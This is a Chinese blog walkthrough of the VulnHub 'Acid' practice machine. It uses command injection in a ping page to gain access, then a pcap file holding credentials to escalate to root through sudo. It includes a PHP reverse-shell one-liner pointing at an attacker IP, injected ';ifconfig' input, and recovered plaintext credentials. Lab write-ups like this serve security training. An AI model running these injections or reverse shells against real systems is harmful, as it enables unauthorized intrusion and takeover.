靶机-Acid练习:命令注入php反弹shell,使用sudo提权

靶机下载地址:https://download.vulnhub.com/acid/Acid.rar

1.主机发现

2.端口信息扫描

3.访问该端口

查看源码,未发现有效信息

4.尝试扫描一下web目录:打开kali自带的DirBuster或者御剑

或者

依次访问看看

是一个数据库文件下载

下载后打开看看,乱码未能解析

访问Challenge目录下网页

是一个登录界面,对该目录下继续进行扫描

继续访问

下面是一个文件包含漏洞页面,未发现上传点,无法拿shell

继续扫描/Challenge/Magic_Box下的目录

依次访问

发现command.php页面含有ping命令,联系到命令注入,可用burpsuite进行抓包

给发送包后面添加;ifconfig,并查看返回包,执行成功

5.开启监听,尝试通过php反弹shell

;php -r '$sock=fsockopen("192.168.109.159",7777);exec("/bin/sh -i <&3 >&3 2>&3");'  使用URL编码,防止不执行

反弹shell成功

使用python调用本地shell

查看权限信息以及有哪些用户

6.提权

查看用户文件:find / -user acid 2>/dev/null  #查找acid用户文件,并将标准错误重定向到空设备(即不显示报错)

搜索一下如何利用,发现这是一个wireshark流量抓包文件,传送到本地,用wireshark打开看看

scp /sbin/raw_vs_isi/hint.pcapng root@192.168.109.159:/root/

在kali中打开ssh服务

再次传送文件成功

用kali自带的wireshark打开

切换用户试试,用户名:saman  密码:1337hax0r

切换成功,使用sudo -i提权至root用户

  • sudo : 暂时切换到超级用户模式以执行超级用户权限,提示输入密码时该密码为当前用户的密码,而不是超级账户的密码。不过有时间限制,Ubuntu默认为一次时长15分钟。
  • su : 切换到某某用户模式,提示输入密码时该密码为切换后账户的密码,用法为“su 账户名称”。如果后面不加账户时系统默认为root账户,密码也为超级账户的密码。没有时间限制。
  • sudo -i: 为了频繁的执行某些只有超级用户才能执行的权限,而不用每次输入密码,可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。执行该命令后提示符变为“#”而不是“$”。想退回普通账户时可以执行“exit”或“logout” 。

参考:https://forum.ubuntu.org.cn/viewtopic.php?t=372636

查看flag文件

©️2020 CSDN 皮肤主题: 精致技术 设计师:CSDN官方博客 返回首页